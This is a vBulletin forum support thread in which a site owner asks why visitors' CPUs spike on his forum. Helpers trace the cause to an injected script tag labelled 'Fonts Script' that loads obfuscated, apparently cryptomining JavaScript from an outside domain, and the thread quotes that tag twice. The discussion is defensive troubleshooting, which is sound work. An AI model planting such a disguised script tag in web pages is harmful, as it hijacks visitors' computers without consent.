Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions
  #1  
Old 03-21-2018, 06:38 AM
MasturB MasturB is offline
 
Join Date: Jul 2013
Posts: 22
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Forum users complaining bitmining malware is running.

Hello,

A few of my users have reported that my website currently has bitmining malware running whenever they visit it.

They're CPU activity monitors are skyrocketing when they enter my site and then it drops once it closes it in the browser. Any suggestions?
Reply With Quote
  #2  
Old 03-21-2018, 01:37 PM
Dave Dave is offline
 
Join Date: May 2010
Posts: 2,583
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

View the source-code of your website and find the miner name, then search for that name in your theme's templates and/or plugins. We need a bit more information in order to help you, e.g. URL to the site.
Reply With Quote
  #3  
Old 03-21-2018, 05:36 PM
MasturB MasturB is offline
 
Join Date: Jul 2013
Posts: 22
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by Dave View Post
View the source-code of your website and find the miner name, then search for that name in your theme's templates and/or plugins. We need a bit more information in order to help you, e.g. URL to the site.
Thanks Dave.

Its chopcountry.com
Reply With Quote
  #4  
Old 03-21-2018, 05:57 PM
final kaoss final kaoss is offline
 
Join Date: Apr 2006
Posts: 1,314
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I notice that on your site, ublock is blocking a resource from.
31.187.64.40
https://www.abuseipdb.com/whois/31.187.64.40
And
analytics-scripts.ml

Also your site is marked as infected.
https://sitecheck.sucuri.net/results...rums/forum.php
Reply With Quote
  #5  
Old 03-21-2018, 06:03 PM
MasturB MasturB is offline
 
Join Date: Jul 2013
Posts: 22
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by final kaoss View Post
I notice that on your site, ublock is blocking a resource from.
31.187.64.40
https://www.abuseipdb.com/whois/31.187.64.40
And
analytics-scripts.ml
I just got off the phone with GoDaddy Security Tech. He checked the SQL for GoDaddy Hosting, and oddly enough he said there was a Stats Collector in the script/software that was hoarding all the CPU resources.

He obviosuly wasn't allowed to go in Admin and look, but he seemed pretty confident it was a Stats thing that was using up all the CPU.

So the stats thing might be the analytics scripts you've found.
Reply With Quote
  #6  
Old 03-21-2018, 06:36 PM
Dave Dave is offline
 
Join Date: May 2010
Posts: 2,583
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

At the bottom of your page you have:
HTML Code:
<!-- Fonts Script -->
<script type="text/javascript" src="http://analytics-scripts.ml/js/sans-serif.js"></script>
<!-- End Fonts Script -->
which contains code that looks extremely fishy (obfuscated). I would remove it asap. It definitely does not look like a legitimate analytics script.
Reply With Quote
  #7  
Old 03-21-2018, 06:39 PM
MasturB MasturB is offline
 
Join Date: Jul 2013
Posts: 22
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by Dave View Post
At the bottom of your page you have:
HTML Code:
<!-- Fonts Script -->
<script type="text/javascript" src="http://analytics-scripts.ml/js/sans-serif.js"></script>
<!-- End Fonts Script -->
which contains code that looks extremely fishy (obfuscated). I would remove it asap. It definitely does not look like a legitimate analytics script.
How do I remove it?

Do I go through Admin panel? Keep in mind I'm practically a novice at this. When I bought the license and hosting in 2013, I was doing my best to learn on the fly and play around with stuff through trial and error to learn. But since the website has been running smooth wit no issues for the last 5 years there was no reason for me to stay sharp on all of this.
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 12:04 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.03908 seconds
  • Memory Usage 2,219KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (2)bbcode_html
  • (3)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (7)post_thanks_box
  • (7)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (7)post_thanks_postbit_info
  • (7)postbit
  • (7)postbit_onlinestatus
  • (7)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete